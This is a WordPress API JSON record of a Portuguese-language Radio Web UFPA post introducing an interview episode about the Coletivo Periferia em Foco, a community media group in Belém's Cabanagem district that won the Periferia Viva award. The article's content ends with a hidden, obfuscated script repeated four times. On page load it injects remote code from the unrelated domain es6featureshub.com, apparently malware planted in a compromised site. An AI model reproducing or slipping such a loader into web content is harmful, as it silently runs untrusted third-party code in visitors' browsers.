{"id":14592,"date":"2023-11-24T19:42:37","date_gmt":"2023-11-24T22:42:37","guid":{"rendered":"https:\/\/radio.ufpa.br\/?p=14592"},"modified":"2025-10-21T12:49:44","modified_gmt":"2025-10-21T15:49:44","slug":"coletivo-periferia-em-foco-premio-periferia-viva","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/","title":{"rendered":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Coletivo Periferia em Foco: pr\u00eamio Periferia Viva&#8221;<\/p><p class=\"category\">UFPA Entrevista<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/UFPA-ENTREVISTA-PERIFERIA-EM-FOCO-27.11.23.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista. No programa, a apresentadora Elissandra Batista conversa com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto que foi selecionado pelo edital Periferia Viva da Secret\u00e1ria Nacional de Periferias do Minist\u00e9rio das Cidades, conquistando o 1\u00b0 lugar entre as sete iniciativas da regi\u00e3o Norte que tamb\u00e9m se destacaram na premia\u00e7\u00e3o.<\/p>\n\n\n\n<p>Na \u00e1rea da comunica\u00e7\u00e3o popular, explorando, principalmente, as redes sociais como o Instagram, o Coletivo Periferia em Foco surgiu com o objetivo de desconstruir os estere\u00f3tipos criados sobre os bairros perif\u00e9ricos da capital paraense.<\/p>\n\n\n\n<p>\u201cH\u00e1 sete anos n\u00f3s estamos contando o outro lado da periferia, ressaltando essa pot\u00eancia que \u00e9 a periferia. E a gente usa as redes sociais para noticiar o lado bom da periferia, partindo do bairro da Cabanagem, mas o nosso recorte \u00e9 a periferia de Bel\u00e9m\u201d, explica Wellington Fraz\u00e3o.&nbsp;<\/p>\n\n\n\n<p>Para o idealizador do projeto, os problemas sociais das periferias retratados pela grande m\u00eddia como \u201ccar\u00eancia\u201d, na verdade, est\u00e3o relacionados apenas ao descaso do poder p\u00fablico, que quando faz a sua parte colabora para a transforma\u00e7\u00e3o e desconstru\u00e7\u00e3o do preconceito e marginaliza\u00e7\u00e3o refor\u00e7ados pela imprensa comercial.<\/p>\n\n\n\n<p>\u201cHoje existe um programa governamental dentro do bairro da Cabanagem e a gente consegue visualizar as pot\u00eancias da periferia sendo lapidadas. E o Periferia em Foco acompanhou a chegada desse programa governamental no bairro, provando que era muito daquilo que a gente acreditava, ou seja, a comunidade carente \u00e9, na verdade, uma comunidade ausente de pol\u00edticas p\u00fablicas\u201d, destaca o coordenador do Periferia em Foco.<\/p>\n\n\n\n<p>Para contribuir com o olhar al\u00e9m das mazelas sociais, o Periferia em Foco tamb\u00e9m promove o projeto M\u00fasica na Esquina que envolve jovens e crian\u00e7as da Cabanagem. Criado em 2019, a a\u00e7\u00e3o proporciona concertos musicais pelas ruas do bairro, buscando valorizar de fato os talentos da \u00e1rea, independentemente das iniciativas do governo.<\/p>\n\n\n\n<p>Assim, construir uma comunica\u00e7\u00e3o popular que atue pensando em tratar a not\u00edcia de forma mais humanizada e sempre apontando solu\u00e7\u00f5es para os problemas \u00e9 um dos diferenciais do Coletivo Periferia em Foco, que comemora a premia\u00e7\u00e3o no edital Periferia Viva. \u201cEsse pr\u00eamio valoriza o nosso trabalho e vai nos dar a chance de nos instrumentalizar, de nos profissionalizar e come\u00e7ar a ser refer\u00eancia de fato em comunica\u00e7\u00e3o comunit\u00e1ria na Amaz\u00f4nia\u201d, celebra Wellington Fraz\u00e3o.<\/p>\n\n\n\n<p>Para saber mais detalhes sobre o Coletivo de Comunica\u00e7\u00e3o Popular Periferia em Foco, e ainda, conhecer um pouco da trajet\u00f3ria e atua\u00e7\u00e3o no bairro da Cabanagem, em Bel\u00e9m, n\u00e3o perca est\u00e1 edi\u00e7\u00e3o do UFPA Entrevista.<\/p>\n\n\n\n<p>Ou\u00e7a tamb\u00e9m: <\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/tv-periferia-em-foco\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/tv-periferia-em-foco\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/projeto-vozes-da-periferia\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/projeto-vozes-da-periferia\/<\/a> <\/p>\n\n\n\n<p><a href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/escola-de-comunicacao-papa-francisco\/<\/a><\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\" aria-label=\"Read more about Coletivo Periferia em Foco: pr\u00eamio Periferia Viva\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":14603,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[36],"tags":[],"class_list":["post-14592","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-entrevista"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-11-24T22:42:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:49:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva\",\"datePublished\":\"2023-11-24T22:42:37+00:00\",\"dateModified\":\"2025-10-21T15:49:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\"},\"wordCount\":506,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1\",\"articleSection\":[\"UFPA Entrevista\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\",\"name\":\"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1\",\"datePublished\":\"2023-11-24T22:42:37+00:00\",\"dateModified\":\"2025-10-21T15:49:44+00:00\",\"description\":\"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1\",\"width\":1920,\"height\":1080,\"caption\":\"Coletivo Periferia em Foco\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA","description":"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/","og_locale":"pt_BR","og_type":"article","og_title":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA","og_description":"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-11-24T22:42:37+00:00","article_modified_time":"2025-10-21T15:49:44+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva","datePublished":"2023-11-24T22:42:37+00:00","dateModified":"2025-10-21T15:49:44+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/"},"wordCount":506,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","articleSection":["UFPA Entrevista"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/","name":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","datePublished":"2023-11-24T22:42:37+00:00","dateModified":"2025-10-21T15:49:44+00:00","description":"O Coletivo Periferia em Foco est\u00e1 em destaque nesta edi\u00e7\u00e3o do UFPA Entrevista, com o Jornalista Wellington Fraz\u00e3o, coordenador do projeto.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","width":1920,"height":1080,"caption":"Coletivo Periferia em Foco"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-entrevista\/coletivo-periferia-em-foco-premio-periferia-viva\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Coletivo Periferia em Foco: pr\u00eamio Periferia Viva"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/11\/cabanagem-cabanagem.jpg?fit=1920%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3Nm","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=14592"}],"version-history":[{"count":13,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14592\/revisions"}],"predecessor-version":[{"id":17752,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14592\/revisions\/17752"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/14603"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=14592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=14592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=14592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}